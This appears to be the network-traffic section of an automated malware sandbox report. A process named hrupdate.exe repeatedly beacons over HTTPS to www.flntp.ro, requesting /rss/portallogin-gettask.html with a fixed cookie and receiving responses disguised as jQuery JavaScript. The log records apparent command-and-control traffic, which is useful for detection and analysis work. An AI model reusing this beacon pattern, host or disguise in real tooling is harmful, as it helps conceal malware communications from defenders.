                                                              2024-12-19 21:41:07 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:08 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:08 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:08 UTC | 5671 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              27 | 192.168.2.4 | 49786 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:09 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:10 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:10 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:10 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              28 | 192.168.2.4 | 49792 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:12 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:12 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:12 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:12 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              29 | 192.168.2.4 | 49798 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:14 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:15 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:14 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:15 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              30 | 192.168.2.4 | 49804 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:16 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:17 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:17 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:17 UTC | 5671 | IN
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              31 | 192.168.2.4 | 49810 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:18 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:19 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:19 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:19 UTC | 5649 | IN
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              32 | 192.168.2.4 | 49815 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:20 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:21 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:21 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:21 UTC | 5713 | IN
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              33 | 192.168.2.4 | 49821 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:23 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:24 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:23 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:24 UTC | 5628 | IN
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              34 | 192.168.2.4 | 49827 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:25 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:26 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:26 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:26 UTC | 5671 | IN
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              35 | 192.168.2.4 | 49833 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:28 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:29 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:28 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:29 UTC | 5713 | IN
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              36 | 192.168.2.4 | 49840 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:30 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:31 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:31 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:31 UTC | 5713 | IN
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              37 | 192.168.2.4 | 49846 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:32 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:33 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:33 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:33 UTC | 5649 | IN
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              38 | 192.168.2.4 | 49852 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:35 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:35 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:35 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5692
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:35 UTC | 5692 | IN
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              39 | 192.168.2.4 | 49858 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:37 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:38 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:38 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:38 UTC | 5713 | IN
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              40 | 192.168.2.4 | 49865 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:40 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:40 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:40 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5692
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:40 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              41 | 192.168.2.4 | 49871 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:42 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:43 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:42 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:43 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              42 | 192.168.2.4 | 49877 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:44 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:45 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:45 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:45 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              43 | 192.168.2.4 | 49882 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:46 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:47 UTC | 235 | IN | HTTP/1.1 200 OK
